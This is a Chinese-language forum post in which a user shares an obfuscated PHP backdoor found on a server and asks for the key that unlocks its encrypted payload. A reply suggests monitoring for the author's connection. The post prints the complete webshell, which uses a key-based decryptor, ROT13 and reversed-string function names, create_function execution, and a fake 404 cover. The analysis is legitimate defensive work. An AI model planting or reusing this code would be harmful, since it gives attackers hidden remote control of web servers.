求助,有没有师傅见过这种后门,想知道key值

无意中发现一个奇怪的后门,D盾认证为已知后门,text值在某些后门网站记录着,D盾也认证为已知后门,应该是以前某位大佬常用的,经过分析发现需要key解出一句话才能继续传参执行.有大佬知道这个key值吗

error_reporting(0);
set_time_limit(0);
function amazon_base($data,$key){
        $key=md5($key);
        $x=0;
        $data=base64_decode($data);
                $len = strlen($data);
                $l = strlen($key);
                $char='';
        for ($i=0;$i< $len;$i++)
        {
            if ($x== $l) $x=0;
            $char.=substr($key,$x,1);
            $x++;
        }
                $str='';
        for ($i=0;$i< $len;$i++)
        {
            if (ord(substr($data,$i,1))<ord(substr($char,$i,1)))
            {
                $str.=chr((ord(substr($data,$i,1))+256)-ord(substr($char,$i,1)));
            }
            else
            {
                $str.=chr(ord(substr($data,$i,1))-ord(substr($char,$i,1)));
            }
        }
        return base64_decode($str);
}
if(@$_REQUEST['key']){
$text=amazon_base('tn96sr2Ol5vGzrqtln16mo22nMqtrZ/Ofpqnnotifn+6jY5/uGiFl62Trp+VjaChlNCt1MKL0tiXqpSXf3R+e75phqXGaoCctai6q5WNipt8zKCY',$_REQUEST['key']);
$S3=strrev('31tor_rtS');$S4=$S3('onfr64_qrpbqr');$SS=$S4($S3(D3WyLKEyK0M1ozA0nJ9h));$St=$SS('',$text);$St();
}else{
Exit(@Header('HTTP/1.0 404 Not Found'));
}

可以写一个监听,试试能不能监听到留这个后门的作者连接这个文件,这种私人key挺难的。要么就是作者圈内的告诉你,不然挺难猜到或者爆破到

2 个赞